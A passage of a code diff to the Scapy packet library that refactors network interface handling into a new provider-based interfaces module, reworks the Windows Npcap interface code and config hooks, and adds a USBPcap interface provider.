conf.loopback_name = NPCAP_LOOPBACK_NAME @@ -269,7 +275,7 @@ def _resolve_ips(y): return [ { "name": _str_decode(x["friendly_name"]), - "win_index": x["interface_index"], + "index": x["interface_index"], "description": _str_decode(x["description"]), "guid": _str_decode(x["adapter_name"]), "mac": _get_mac(x), @@ -280,28 +286,6 @@ def _resolve_ips(y): ] -def get_ips(v6=False): - """Returns all available IPs matching to interfaces, using the windows system. - Should only be used as a WinPcapy fallback.""" - res = {} - for iface in six.itervalues(IFACES): - ips = [] - for ip in iface.ips: - if v6 and ":" in ip: - ips.append(ip) - elif not v6 and ":" not in ip: - ips.append(ip) - res[iface] = ips - return res - - -def get_ip_from_name(ifname, v6=False): - """Backward compatibility: indirectly calls get_ips - Deprecated.""" - iface = IFACES.dev_from_name(ifname) - return get_ips(v6=v6).get(iface, [""])[0] - - def _pcapname_to_guid(pcap_name): """Converts a Winpcap/Npcap pcpaname to its guid counterpart. e.g. \\DEVICE\\NPF_{...} => {...} @@ -311,79 +295,39 @@ def _pcapname_to_guid(pcap_name): return pcap_name -class NetworkInterface(object): +class NetworkInterface_Win(NetworkInterface): """A network interface of your local host""" - def __init__(self, data=None): - self.name = None - self.ip = None - self.ip6 = None - self.mac = None - self.pcap_name = None - self.description = None - self.invalid = False - self.raw80211 = None + def __init__(self, provider, data=None): self.cache_mode = None self.ipv4_metric = None self.ipv6_metric = None - self.ips = None - self.flags = None - if data is not None: - self.update(data) + self.guid = None + self.raw80211 = None + super(NetworkInterface_Win, self).__init__(provider, data) def update(self, data): """Update info about a network interface according to a given dictionary. Such data is provided by get_windows_if_list """ - self.data = data - self.name = data['name'] - self.pcap_name = data['pcap_name'] - self.description = data['description'] - self.win_index = data['win_index'] + # Populated early because used below + self.network_name = data['network_name'] + # Windows specific self.guid = data['guid'] - self.mac = data['mac'] self.ipv4_metric = data['ipv4_metric'] self.ipv6_metric = data['ipv6_metric'] - self.ips = data['ips'] - self.flags = data['flags'] - self.invalid = data['invalid'] try: # Npcap loopback interface - if conf.use_npcap and self.pcap_name == NPCAP_LOOPBACK_NAME: + if conf.use_npcap and self.network_name == NPCAP_LOOPBACK_NAME: # https://nmap.org/npcap/guide/npcap-devguide.html - self.mac = "00:00:00:00:00:00" - self.ip = "127.0.0.1" - self.ip6 = "::1" - return + data["mac"] = "00:00:00:00:00:00" + data["ip"] = "127.0.0.1" + data["ip6"] = "::1" + data["ips"] = ["127.0.0.1", "::1"] except KeyError: pass - - # Chose main IPv4 - if self.ips: - try: - self.ip = next(x for x in self.ips if ":" not in x) - except StopIteration: - pass - try: - self.ip6 = next(x for x in self.ips if ":" in x) - except StopIteration: - pass - if not self.ip and not self.ip6: - self.invalid = True - - def __hash__(self): - return hash(self.guid) - - def __eq__(self, other): - if isinstance(other, str): - return self.name == other or self.pcap_name == other - if isinstance(other, NetworkInterface): - return self.data == other.data - return object.__eq__(self, other) - - def is_invalid(self): - return self.invalid + super(NetworkInterface_Win, self).update(data) def _check_npcap_requirement(self): if not conf.use_npcap: @@ -392,7 +336,7 @@ def _check_npcap_requirement(self): val = _get_npcap_config("Dot11Support") self.raw80211 = bool(int(val)) if val else False if not self.raw80211: - raise Scapy_Exception("This interface does not support raw 802.11") + raise Scapy_Exception("Npcap 802.11 support is NOT enabled !") def _npcap_set(self, key, val): """Internal function. Set a [key] parameter to [value]""" @@ -551,51 +495,16 @@ def setmodulation(self, modu): m = _modus.get(modu, "unknown") if isinstance(modu, int) else modu return self._npcap_set("modu", str(m)) - def __repr__(self): - return "<%s [%s] %s>" % (self.__class__.__name__, - self.description, - self.guid) +class WindowsInterfacesProvider(InterfaceProvider): + name = "libpcap" + libpcap = True -def get_if_raw_addr(iff): - """Return the raw IPv4 address of interface""" - if not iff.ip: - return None - return inet_pton(socket.AF_INET, iff.ip) - - -def pcap_service_name(): - """Return the pcap adapter service's name""" - return "npcap" if conf.use_npcap else "npf" - - -def pcap_service_status(): - """Returns whether the windows pcap adapter is running or not""" - status = get_service_status(pcap_service_name()) - return status["dwCurrentState"] == 4 - - -def _pcap_service_control(action, askadmin=True): - """Internal util to run pcap control command""" - command = action + ' ' + pcap_service_name() - res, code = _exec_cmd(_encapsulate_admin(command) if askadmin else command) - if code != 0: - warning(res.decode("utf8", errors="ignore")) - return (code == 0) - - -def pcap_service_start(askadmin=True): - """Starts the pcap adapter. Will ask for admin. Returns True if success""" - return _pcap_service_control('sc start', askadmin=askadmin) - - -def pcap_service_stop(askadmin=True): - """Stops the pcap adapter. Will ask for admin. Returns True if success""" - return _pcap_service_control('sc stop', askadmin=askadmin) - - -class NetworkInterfaceDict(UserDict): - """Store information about network interfaces and convert between names""" + def _is_valid(self, dev): + # Winpcap (and old Npcap) have no support for PCAP_IF_UP :( + if dev.flags == 0: + return True + return dev.flags & PCAP_IF_UP @classmethod def _pcap_check(cls): @@ -640,10 +549,11 @@ def _ask_user(): "Scapy might help. Check your winpcap/npcap installation " "and access rights.") - def load(self): - if not get_if_list(): + def load(self, NetworkInterface_Win=NetworkInterface_Win): + results = {} + if not conf.cache_pcapiflist: # Try a restart - NetworkInterfaceDict._pcap_check() + WindowsInterfacesProvider._pcap_check() windows_interfaces = dict() for i in get_windows_if_list(): @@ -656,26 +566,24 @@ def load(self): windows_interfaces[i['guid']] = i index = 0 - for pcap_name, if_data in six.iteritems(conf.cache_iflist): - name, ips, flags = if_data - guid = _pcapname_to_guid(pcap_name) + for netw, if_data in six.iteritems(conf.cache_pcapiflist): + name, ips, flags, _ = if_data + guid = _pcapname_to_guid(netw) data = windows_interfaces.get(guid, None) if data: # Exists in Windows registry - data['pcap_name'] = pcap_name - data['ips'].extend(ips) + data['network_name'] = netw + data['ips'] = list(set(data['ips'] + ips)) data['flags'] = flags - data['invalid'] = False else: # Only in [Wi]npcap index -= 1 data = { 'name': name, - 'pcap_name': pcap_name, 'description': name, - 'win_index': index, + 'index': index, 'guid': guid, - 'invalid': False, + 'network_name': netw, 'mac': '00:00:00:00:00:00', 'ipv4_metric': 0, 'ipv6_metric': 0, @@ -683,124 +591,95 @@ def load(self): 'flags': flags } # No KeyError will happen here, as we get it from cache - self.data[guid] = NetworkInterface(data) - - def dev_from_name(self, name): - """Return the first pcap device name for a given Windows - device name. - """ - try: - return next(iface for iface in six.itervalues(self) - if (iface.name == name or iface.description == name)) - except (StopIteration, RuntimeError): - raise ValueError("Unknown network interface %r" % name) - - def dev_from_pcapname(self, pcap_name): - """Return Windows device name for given pcap device name.""" - try: - return next(iface for iface in six.itervalues(self) - if iface.pcap_name == pcap_name) - except (StopIteration, RuntimeError): - raise ValueError("Unknown pypcap network interface %r" % pcap_name) - - def dev_from_index(self, if_index): - """Return interface name from interface index""" - try: - if_index = int(if_index) # Backward compatibility - return next(iface for iface in six.itervalues(self) - if iface.win_index == if_index) - except (StopIteration, RuntimeError): - if str(if_index) == "1": - return IFACES.dev_from_pcapname(conf.loopback_name) - raise ValueError("Unknown network interface index %r" % if_index) + results[guid] = NetworkInterface_Win(self, data) + return results def reload(self): """Reload interface list""" self.restarted_adapter = False - self.data.clear() if conf.use_pcap: # Reload from Winpcapy - from scapy.arch.pcapdnet import load_winpcapy + from scapy.arch.libpcap import load_winpcapy load_winpcapy() - self.load() - # Reload conf.iface - conf.iface = get_working_if() - - def show(self, resolve_mac=True, print_result=True): - """Print list of available network interfaces in human readable form""" - res = [] - for iface_name in sorted(self.data): - dev = self.data[iface_name] - mac = dev.mac - if resolve_mac and conf.manufdb: - mac = conf.manufdb._resolve_MAC(mac) - validity_color = lambda x: conf.color_theme.red if x else \ - conf.color_theme.green - description = validity_color(dev.is_invalid())( - str(dev.description) - ) - index = str(dev.win_index) - res.append((index, description, str(dev.ip), str(dev.ip6), mac)) + return self.load() - res = pretty_list( - res, - [("INDEX", "IFACE", "IPv4", "IPv6", "MAC")], - sortBy=2 - ) - if print_result: - print(res) + +# Register provider +conf.ifaces.register_provider(WindowsInterfacesProvider) + + +def get_ips(v6=False): + """Returns all available IPs matching to interfaces, using the windows system. + Should only be used as a WinPcapy fallback.""" + res = {} + for iface in six.itervalues(conf.ifaces): + if v6: + res[iface] = iface.ips[6] else: - return res + res[iface] = iface.ips[4] + return res - def __repr__(self): - return self.show(print_result=False) +def get_if_raw_addr(iff): + """Return the raw IPv4 address of interface""" + iff = resolve_iface(iff) + if not iff.ip: + return None + return inet_pton(socket.AF_INET, iff.ip) -IFACES = ifaces = NetworkInterfaceDict() -IFACES.load() +def get_ip_from_name(ifname, v6=False): + """Backward compatibility: indirectly calls get_ips + Deprecated.""" + warnings.warn( + "get_ip_from_name is deprecated. Use the `ip` attribute of the iface " + "or use get_ips() to get all ips per interface.", + DeprecationWarning + ) + iface = conf.ifaces.dev_from_name(ifname) + return get_ips(v6=v6).get(iface, [""])[0] -def pcapname(dev): - """Get the device pcap name by device name or Scapy NetworkInterface - """ - if isinstance(dev, NetworkInterface): - if dev.is_invalid(): - return None - return dev.pcap_name - try: - return IFACES.dev_from_name(dev).pcap_name - except ValueError: - return IFACES.dev_from_pcapname(dev).pcap_name +def pcap_service_name(): + """Return the pcap adapter service's name""" + return "npcap" if conf.use_npcap else "npf" -def dev_from_pcapname(pcap_name): - """Return Scapy device name for given pcap device name""" - return IFACES.dev_from_pcapname(pcap_name) +def pcap_service_status(): + """Returns whether the windows pcap adapter is running or not""" + status = get_service_status(pcap_service_name()) + return status["dwCurrentState"] == 4 -def dev_from_index(if_index): - """Return Windows adapter name for given Windows interface index""" - return IFACES.dev_from_index(if_index) +def _pcap_service_control(action, askadmin=True): + """Internal util to run pcap control command""" + command = action + ' ' + pcap_service_name() + res, code = _exec_cmd(_encapsulate_admin(command) if askadmin else command) + if code != 0: + warning(res.decode("utf8", errors="ignore")) + return (code == 0) + + +def pcap_service_start(askadmin=True): + """Starts the pcap adapter. Will ask for admin. Returns True if success""" + return _pcap_service_control('sc start', askadmin=askadmin) -def show_interfaces(resolve_mac=True): - """Print list of available network interfaces""" - return IFACES.show(resolve_mac) +def pcap_service_stop(askadmin=True): + """Stops the pcap adapter. Will ask for admin. Returns True if success""" + return _pcap_service_control('sc stop', askadmin=askadmin) if conf.use_pcap: - _orig_open_pcap = pcapdnet.open_pcap + _orig_open_pcap = libpcap.open_pcap def open_pcap(iface, *args, **kargs): """open_pcap: Windows routine for creating a pcap from an interface. This function is also responsible for detecting monitor mode. """ - iface_pcap_name = pcapname(iface) - if not isinstance(iface, NetworkInterface) and \ - iface_pcap_name is not None: - iface = IFACES.dev_from_name(iface) - if iface is None or iface.is_invalid(): + iface = resolve_iface(iface) + iface_network_name = iface.network_name + if not iface: raise Scapy_Exception( "Interface is invalid (no pcap match found) !" ) @@ -814,12 +693,13 @@ def open_pcap(iface, *args, **kargs): # The monitor param is specified, and not matching the current # interface state iface.setmonitor(kw_monitor) - return _orig_open_pcap(iface_pcap_name, *args, **kargs) - pcapdnet.open_pcap = open_pcap + return _orig_open_pcap(iface_network_name, *args, **kargs) + libpcap.open_pcap = open_pcap -get_if_raw_hwaddr = pcapdnet.get_if_raw_hwaddr = lambda iface, *args, **kargs: ( # noqa: E501 - ARPHDR_ETHER, mac2str(IFACES.dev_from_pcapname(pcapname(iface)).mac) -) + +def get_if_raw_hwaddr(iface): + iface = resolve_iface(iface) + return ARPHDR_ETHER, mac2str(iface.mac) def _read_routes_c_v1(): @@ -843,9 +723,10 @@ def _extract_ip(obj): except ValueError: continue ip = iface.ip + netw = network_name(iface) # RouteMetric + InterfaceMetric metric = metric + iface.ipv4_metric - routes.append((dest, netmask, nexthop, iface, ip, metric)) + routes.append((dest, netmask, nexthop, netw, ip, metric)) return routes @@ -883,14 +764,15 @@ def _extract_ip(obj): except ValueError: continue ip = iface.ip + netw = network_name(iface) # RouteMetric + InterfaceMetric metric = metric + getattr(iface, metric_name) if ipv6: _append_route6(routes, dest, netmask, nexthop, - iface, lifaddr, metric) + netw, lifaddr, metric) else: routes.append((atol(dest), itom(int(netmask)), - nexthop, iface, ip, metric)) + nexthop, netw, ip, metric)) return routes @@ -933,7 +815,7 @@ def in6_getifaddr(): def _append_route6(routes, dpref, dp, nh, iface, lifaddr, metric): cset = [] # candidate set (possible source addresses) - if iface.name == conf.loopback_name: + if iface == conf.loopback_name: if dpref == '::': return cset = ['::1'] @@ -957,32 +839,6 @@ def read_routes6(): return routes6 -def get_working_if(): - """Return an interface that works""" - try: - # return the interface associated with the route with smallest - # mask (route by default if it exists) - iface = min(conf.route.routes, key=lambda x: x[1])[3] - except ValueError: - # no route - iface = conf.loopback_name - if isinstance(iface, NetworkInterface) and iface.is_invalid(): - # Backup mode: try them all - for iface in six.itervalues(IFACES): - if not iface.is_invalid(): - return iface - return None - return iface - - -def _get_valid_guid(): - if conf.loopback_name: - return conf.loopback_name.guid - else: - return next((i.guid for i in six.itervalues(IFACES) - if not i.is_invalid()), None) - - def _route_add_loopback(routes=None, ipv6=False, iflist=None): """Add a route to 127.0.0.1 and ::1 to simplify unit tests on Windows""" if not WINDOWS: @@ -996,37 +852,25 @@ def _route_add_loopback(routes=None, ipv6=False, iflist=None): else: if not conf.route.routes: return - data = { - 'name': conf.loopback_name, - 'pcap_name': "\\Device\\NPF_{0XX00000-X000-0X0X-X00X-00XXXX000XXX}", - 'description': "Loopback", - 'win_index': -1, - 'guid': "{0XX00000-X000-0X0X-X00X-00XXXX000XXX}", - 'invalid': True, - 'mac': '00:00:00:00:00:00', - 'ipv4_metric': 0, - 'ipv6_metric': 0, - 'ips': ["127.0.0.1", "::"], - 'flags': 0 - } - adapter = NetworkInterface(data) + conf.ifaces._add_fake_iface(conf.loopback_name) + adapter = conf.ifaces.dev_from_name(conf.loopback_name) if iflist: - iflist.append(adapter.pcap_name) + iflist.append(adapter.network_name) return # Remove all conf.loopback_name routes for route in list(conf.route.routes): iface = route[3] - if iface.pcap_name == conf.loopback_name: + if iface == conf.loopback_name: conf.route.routes.remove(route) # Remove conf.loopback_name interface - for devname, iface in list(IFACES.items()): - if iface.pcap_name == conf.loopback_name: - IFACES.pop(devname) + for devname, iface in list(conf.ifaces.items()): + if iface == conf.loopback_name: + conf.ifaces.pop(devname) # Inject interface - IFACES["{0XX00000-X000-0X0X-X00X-00XXXX000XXX}"] = adapter - conf.loopback_name = adapter.pcap_name + conf.ifaces["{0XX00000-X000-0X0X-X00X-00XXXX000XXX}"] = adapter + conf.loopback_name = adapter.network_name if isinstance(conf.iface, NetworkInterface): - if conf.iface.pcap_name == conf.loopback_name: + if conf.iface.network_name == conf.loopback_name: conf.iface = adapter conf.netcache.arp_cache["127.0.0.1"] = "ff:ff:ff:ff:ff:ff" conf.netcache.in6_neighbor["::1"] = "ff:ff:ff:ff:ff:ff" diff --git a/scapy/arch/windows/native.py b/scapy/arch/windows/native.py index c0c353bbc45..37815c2c2a6 100644 --- a/scapy/arch/windows/native.py +++ b/scapy/arch/windows/native.py @@ -56,6 +56,7 @@ from scapy.config import conf from scapy.data import MTU from scapy.error import Scapy_Exception, warning +from scapy.interfaces import resolve_iface from scapy.supersocket import SuperSocket # Watch out for import loops (inet...) @@ -115,7 +116,7 @@ def __init__(self, iface=None, proto=socket.IPPROTO_IP, self.ins.setsockopt(socket.IPPROTO_IP, socket.IP_TTL, ttl) self.outs.setsockopt(socket.IPPROTO_IP, socket.IP_TTL, ttl) # Bind on all ports - iface = iface or conf.iface + iface = resolve_iface(iface) or conf.iface host = iface.ip if iface.ip else socket.gethostname() self.ins.bind((host, 0)) self.ins.setblocking(False) diff --git a/scapy/compat.py b/scapy/compat.py index 421f6779c04..72592cb7070 100644 --- a/scapy/compat.py +++ b/scapy/compat.py @@ -109,6 +109,14 @@ def bytes_base64(x): return base64.encodebytes(bytes_encode(x)).replace(b'\n', b'') +if six.PY2: + import cgi + html_escape = cgi.escape +else: + import html + html_escape = html.escape + + if six.PY2: from StringIO import StringIO diff --git a/scapy/config.py b/scapy/config.py index e5820ec75aa..9afeddf5e71 100755 --- a/scapy/config.py +++ b/scapy/config.py @@ -72,8 +72,9 @@ def set_from_hook(obj, name, val): setattr(obj, int_name, val) def __set__(self, obj, val): + old = getattr(obj, self.intname, self.default) + val = self.hook(self.name, val, old, *self.args, **self.kargs) setattr(obj, self.intname, val) - self.hook(self.name, val, *self.args, **self.kargs) def _readonly(name): @@ -441,8 +442,9 @@ def isPyPy(): return False -def _prompt_changer(attr, val): +def _prompt_changer(attr, val, old): """Change the current prompt theme""" + Interceptor.set_from_hook(conf, attr, val) try: sys.ps1 = conf.color_theme.prompt(conf.prompt) except Exception: @@ -451,13 +453,13 @@ def _prompt_changer(attr, val): apply_ipython_style(get_ipython()) except NameError: pass + return getattr(conf, attr, old) def _set_conf_sockets(): """Populate the conf.L2Socket and conf.L3Socket according to the various use_* parameters """ - from scapy.main import _load if conf.use_bpf and not BSD: Interceptor.set_from_hook(conf, "use_bpf", False) raise ScapyInvalidPlatformException("BSD-like (OSX, *BSD...) only !") @@ -469,7 +471,7 @@ def _set_conf_sockets(): # we are already in an Interceptor hook, use Interceptor.set_from_hook if conf.use_pcap: try: - from scapy.arch.pcapdnet import L2pcapListenSocket, L2pcapSocket, \ + from scapy.arch.libpcap import L2pcapListenSocket, L2pcapSocket, \ L3pcapSocket except (OSError, ImportError): warning("No libpcap provider available ! pcap won't be used") @@ -479,9 +481,7 @@ def _set_conf_sockets(): conf.L3socket6 = functools.partial(L3pcapSocket, filter="ip6") conf.L2socket = L2pcapSocket conf.L2listen = L2pcapListenSocket - if conf.interactive: - # Update globals - _load("scapy.arch.pcapdnet") + conf.ifaces.reload() return if conf.use_bpf: from scapy.arch.bpf.supersocket import L2bpfListenSocket, \ @@ -490,9 +490,7 @@ def _set_conf_sockets(): conf.L3socket6 = functools.partial(L3bpfSocket, filter="ip6") conf.L2socket = L2bpfSocket conf.L2listen = L2bpfListenSocket - if conf.interactive: - # Update globals - _load("scapy.arch.bpf") + conf.ifaces.reload() return if LINUX: from scapy.arch.linux import L3PacketSocket, L2Socket, L2ListenSocket @@ -500,9 +498,7 @@ def _set_conf_sockets(): conf.L3socket6 = functools.partial(L3PacketSocket, filter="ip6") conf.L2socket = L2Socket conf.L2listen = L2ListenSocket - if conf.interactive: - # Update globals - _load("scapy.arch.linux") + conf.ifaces.reload() return if WINDOWS: from scapy.arch.windows import _NotAvailableSocket @@ -511,6 +507,7 @@ def _set_conf_sockets(): conf.L3socket6 = L3WinSocket6 conf.L2socket = _NotAvailableSocket conf.L2listen = _NotAvailableSocket + conf.ifaces.reload() # No need to update globals on Windows return from scapy.supersocket import L3RawSocket @@ -519,9 +516,10 @@ def _set_conf_sockets(): conf.L3socket6 = L3RawSocket6 -def _socket_changer(attr, val): +def _socket_changer(attr, val, old): if not isinstance(val, bool): raise TypeError("This argument should be a boolean") + Interceptor.set_from_hook(conf, attr, val) dependencies = { # Things that will be turned off "use_pcap": ["use_bpf"], "use_bpf": ["use_pcap"], @@ -538,11 +536,27 @@ def _socket_changer(attr, val): Interceptor.set_from_hook(conf, key, value) if isinstance(e, ScapyInvalidPlatformException): raise + return getattr(conf, attr) -def _loglevel_changer(attr, val): +def _loglevel_changer(attr, val, old): """Handle a change of conf.logLevel""" log_scapy.setLevel(val) + return val + + +def _iface_changer(attr, val, old): + """Resolves the interface in conf.iface""" + if isinstance(val, str): + from scapy.interfaces import resolve_iface + iface = resolve_iface(val) + if old and iface.dummy: + warning( + "This interface is not specified in any provider ! " + "See conf.ifaces output" + ) + return iface + return val class Conf(ConfClass): @@ -557,7 +571,7 @@ class Conf(ConfClass): #: if 1, prevents any unwanted packet to go out (ARP, DNS, ...) stealth = "not implemented" #: selects the default output interface for srp() and sendp(). - iface = None + iface = Interceptor("iface", None, _iface_changer) layers = LayersList() commands = CommandsList() ASN1_default_codec = None #: Codec used by default for ASN1 objects @@ -616,7 +630,10 @@ class Conf(ConfClass): #: When 1, print some TLS session secrets when they are computed. debug_tls = False wepkey = "" - cache_iflist = {} + #: holds the Scapy interface list and manager + ifaces = None + #: holds the cache of interfaces loaded from Libpcap + cache_pcapiflist = {} #: holds the Scapy IPv4 routing table and provides methods to #: manipulate it route = None # Filed by route.py @@ -642,7 +659,7 @@ class Conf(ConfClass): #: the conf.L[2/3] sockets use_pcap = Interceptor( "use_pcap", - os.getenv("SCAPY_USE_PCAPDNET", "").lower().startswith("y"), + os.getenv("SCAPY_USE_LIBPCAP", "").lower().startswith("y"), _socket_changer ) use_bpf = Interceptor("use_bpf", False, _socket_changer) diff --git a/scapy/fields.py b/scapy/fields.py index 1dcafc08cf7..db85b695ee0 100644 --- a/scapy/fields.py +++ b/scapy/fields.py @@ -2120,7 +2120,11 @@ def __str__(self): x = int(self) while x: if x & 1: - r.append(self.names[i]) + try: + name = self.names[i] + except IndexError: + name = "?" + r.append(name) i += 1 x >>= 1 return ("+" if self.multi else "").join(r) diff --git a/scapy/interfaces.py b/scapy/interfaces.py new file mode 100644 index 00000000000..829e0799277 --- /dev/null +++ b/scapy/interfaces.py @@ -0,0 +1,362 @@ +# This file is part of Scapy +# See http://www.secdev.org/projects/scapy for more information +# Copyright (C) Philippe Biondi +# Copyright (C) Gabriel Potter +# This program is published under a GPLv2 license + +""" +Interfaces management +""" + +import itertools +import uuid +from collections import defaultdict + +from scapy.config import conf +from scapy.consts import WINDOWS +from scapy.utils import pretty_list +from scapy.utils6 import in6_isvalid + +from scapy.modules.six.moves import UserDict +import scapy.modules.six as six + + +class InterfaceProvider(object): + name = "Unknown" + headers = ("Index", "Name", "MAC", "IPv4", "IPv6") + header_sort = 1 + libpcap = False + + def load(self): + """Returns a dictionary of the loaded interfaces, by their + name.""" + raise NotImplementedError + + def reload(self): + """Same than load() but for reloads. By default calls load""" + return self.load() + + def l2socket(self): + """Return L2 socket used by interfaces of this provider""" + return conf.L2socket + + def l2listen(self): + """Return L2listen socket used by interfaces of this provider""" + return conf.L2listen + + def l3socket(self): + """Return L3 socket used by interfaces of this provider""" + return conf.L3socket + + def _is_valid(self, dev): + """Returns whether an interface is valid or not""" + return bool((dev.ips[4] or dev.ips[6]) and dev.mac) + + def _format(self, dev, **kwargs): + """Returns the elements used by show() + + If a tuple is returned, this consist of the strings that will be + inlined along with the interface. + If a list of tuples is returned, they will be appended one above the + other and should all be part of a single interface. + """ + mac = dev.mac + resolve_mac = kwargs.get("resolve_mac", True) + if resolve_mac and conf.manufdb: + mac = conf.manufdb._resolve_MAC(mac) + index = str(dev.index) + return (index, dev.description, mac, dev.ips[4], dev.ips[6]) + + +class NetworkInterface(object): + def __init__(self, provider, data=None): + self.provider = provider + self.name = "" + self.description = "" + self.network_name = "" + self.index = -1 + self.ip = None + self.ips = defaultdict(list) + self.mac = None + self.dummy = False + if data is not None: + self.update(data) + + def update(self, data): + """Update info about a network interface according + to a given dictionary. Such data is provided by providers + """ + self.name = data.get('name', "") + self.description = data.get('description', "") + self.network_name = data.get('network_name', "") + self.index = data.get('index', 0) + self.ip = data.get('ip', "") + self.mac = data.get('mac', "") + self.flags = data.get('flags', 0) + self.dummy = data.get('dummy', False) + + for ip in data.get('ips', []): + if in6_isvalid(ip): + self.ips[6].append(ip) + else: + self.ips[4].append(ip) + + # An interface often has multiple IPv6 so we don't store + # a "main" one, unlike IPv4. + if self.ips[4] and not self.ip: + self.ip = self.ips[4][0] + + def __eq__(self, other): + if isinstance(other, str): + return other in [self.name, self.network_name, self.description] + if isinstance(other, NetworkInterface): + return self.__dict__ == other.__dict__ + return False + + def __ne__(self, other): + return not self.__eq__(other) + + def __hash__(self): + return hash(self.network_name) + + def is_valid(self): + if self.dummy: + return False + return self.provider._is_valid(self) + + def l2socket(self): + return self.provider.l2socket() + + def l2listen(self): + return self.provider.l2listen() + + def l3socket(self): + return self.provider.l3socket() + + def __repr__(self): + return "<%s %s [%s]>" % (self.__class__.__name__, + self.description, + self.dummy and "dummy" or (self.flags or "")) + + def __str__(self): + return self.network_name + + def __add__(self, other): + return self.network_name + other + + def __radd__(self, other): + return other + self.network_name + + +class NetworkInterfaceDict(UserDict): + """Store information about network interfaces and convert between names""" + + def __init__(self): + self.providers = {} + UserDict.__init__(self) + + def _load(self, dat, prov): + for ifname, iface in six.iteritems(dat): + if ifname in self.data: + # Handle priorities: keep except if libpcap + if prov.libpcap: + self.data[ifname] = iface + else: + self.data[ifname] = iface + + def register_provider(self, provider): + prov = provider() + self.providers[provider] = prov + + def load_confiface(self): + """ + Reload conf.iface + """ + # Can only be called after conf.route is populated + if not conf.route: + raise ValueError("Error: conf.route isn't populated !") + conf.iface = get_working_if() + + def _reload_provs(self): + self.clear() + for prov in self.providers.values(): + self._load(prov.reload(), prov) + + def reload(self): + self._reload_provs() + if conf.route: + self.load_confiface() + + def dev_from_name(self, name): + """Return the first network device name for a given + device name. + """ + try: + return next(iface for iface in six.itervalues(self) + if (iface.name == name or iface.description == name)) + except (StopIteration, RuntimeError): + raise ValueError("Unknown network interface %r" % name) + + def dev_from_networkname(self, network_name): + """Return interface for a given network device name.""" + try: + return next(iface for iface in six.itervalues(self) + if iface.network_name == network_name) + except (StopIteration, RuntimeError): + raise ValueError( + "Unknown network interface %r" % + network_name) + + def dev_from_index(self, if_index): + """Return interface name from interface index""" + try: + if_index = int(if_index) # Backward compatibility + return next(iface for iface in six.itervalues(self) + if iface.index == if_index) + except (StopIteration, RuntimeError): + if str(if_index) == "1": + # Test if the loopback interface is set up + return self.dev_from_networkname(conf.loopback_name) + raise ValueError("Unknown network interface index %r" % if_index) + + def _add_fake_iface(self, ifname): + """Internal function used for a testing purpose""" + data = { + 'name': ifname, + 'description': ifname, + 'network_name': ifname, + 'index': -1000, + 'dummy': True, + 'mac': '00:00:00:00:00:00', + 'flags': 0, + 'ips': ["127.0.0.1", "::"], + # Windows only + 'guid': "{%s}" % uuid.uuid1(), + 'ipv4_metric': 0, + 'ipv6_metric': 0, + } + if WINDOWS: + from scapy.arch.windows import NetworkInterface_Win, \ + WindowsInterfacesProvider + + class FakeProv(WindowsInterfacesProvider): + name = "fake" + + self.data[ifname] = NetworkInterface_Win( + FakeProv(), + data + ) + else: + self.data[ifname] = NetworkInterface(InterfaceProvider(), data) + + def show(self, print_result=True, hidden=False, **kwargs): + """ + Print list of available network interfaces in human readable form + + :param print_result: print the results if True, else return it + :param hidden: if True, also displays invalid interfaces + """ + res = defaultdict(list) + for iface_name in sorted(self.data): + dev = self.data[iface_name] + if not hidden and not dev.is_valid(): + continue + prov = dev.provider + res[prov].append( + (prov.name,) + prov._format(dev, **kwargs) + ) + output = "" + for provider in res: + output += pretty_list( + res[provider], + [("Source",) + provider.headers], + sortBy=provider.header_sort + ) + "\n" + output = output[:-1] + if print_result: + print(output) + else: + return output + + def __repr__(self): + return self.show(print_result=False) + + +conf.ifaces = IFACES = ifaces = NetworkInterfaceDict() + + +def get_if_list(): + """Return a list of interface names""" + return list(conf.ifaces.keys()) + + +def get_working_if(): + """Return an interface that works""" + # return the interface associated with the route with smallest + # mask (route by default if it exists) + routes = conf.route.routes[:] + routes.sort(key=lambda x: x[1]) + ifaces = (x[3] for x in routes) + # First check the routing ifaces from best to worse, + # then check all the available ifaces as backup. + for iface in itertools.chain(ifaces, conf.ifaces.values()): + iface = resolve_iface(iface) + if iface and iface.is_valid(): + return iface + # There is no hope left + return conf.loopback_name + + +def get_working_ifaces(): + """Return all interfaces that work""" + return [iface for iface in conf.ifaces.values() if iface.is_valid()] + + +def dev_from_networkname(network_name): + """Return Scapy device name for given network device name""" + return conf.ifaces.dev_from_networkname(network_name) + + +def dev_from_index(if_index): + """Return interface for a given interface index""" + return conf.ifaces.dev_from_index(if_index) + + +def resolve_iface(dev): + """ + Resolve an interface name into the interface + """ + if isinstance(dev, NetworkInterface): + return dev + try: + return conf.ifaces.dev_from_name(dev) + except ValueError: + try: + return dev_from_networkname(dev) + except ValueError: + pass + # Return a dummy interface + return NetworkInterface( + InterfaceProvider(), + data={ + "name": dev, + "description": dev, + "network_name": dev, + "dummy": True + } + ) + + +def network_name(dev): + """ + Resolves the device network name of a device or Scapy NetworkInterface + """ + iface = resolve_iface(dev) + if iface: + return iface.network_name + return dev + + +def show_interfaces(resolve_mac=True): + """Print list of available network interfaces""" + return conf.ifaces.show(resolve_mac) diff --git a/scapy/layers/usb.py b/scapy/layers/usb.py index 736b2fd28b6..f30d7ae88e7 100644 --- a/scapy/layers/usb.py +++ b/scapy/layers/usb.py @@ -22,6 +22,8 @@ from scapy.fields import ByteField, XByteField, ByteEnumField, LEShortField, \ LEShortEnumField, LEIntField, LEIntEnumField, XLELongField, \ LenField +from scapy.interfaces import NetworkInterface, InterfaceProvider, \ + network_name, IFACES from scapy.packet import Packet, bind_top_down from scapy.supersocket import SuperSocket from scapy.utils import PcapReader @@ -172,7 +174,7 @@ def _extcap_call(prog, args, keyword, values): if not ifa.startswith(keyword): continue res.append(tuple([re.search(r"{%s=([^}]*)}" % val, ifa).group(1) - for val in values])) + for val in values])) return res @@ -191,6 +193,45 @@ def get_usbpcap_interfaces(): ["value", "display"] ) + class UsbpcapInterfaceProvider(InterfaceProvider): + name = "USBPcap" + headers = ("Index", "Name", "Address") + header_sort = 1 + + def load(self): + data = {} + try: + interfaces = get_usbpcap_interfaces() + except OSError: + return {} + for netw_name, name in interfaces: + index = re.search(r".*(\d+)", name) + if index: + index = int(index.group(1)) + 100 + else: + index = 100 + if_data = { + "name": name, + "network_name": netw_name, + "description": name, + "index": index, + } + data[netw_name] = NetworkInterface(self, if_data) + return data + + def l2socket(self): + return conf.USBsocket + l2listen = l2socket + + def l3socket(self): + raise ValueError("No L3 available for USBpcap !") + + def _format(self, dev, **kwargs): + """Returns a tuple of the elements used by show()""" + return (str(dev.index), dev.name, dev.network_name) + + IFACES.register_provider(UsbpcapInterfaceProvider) + 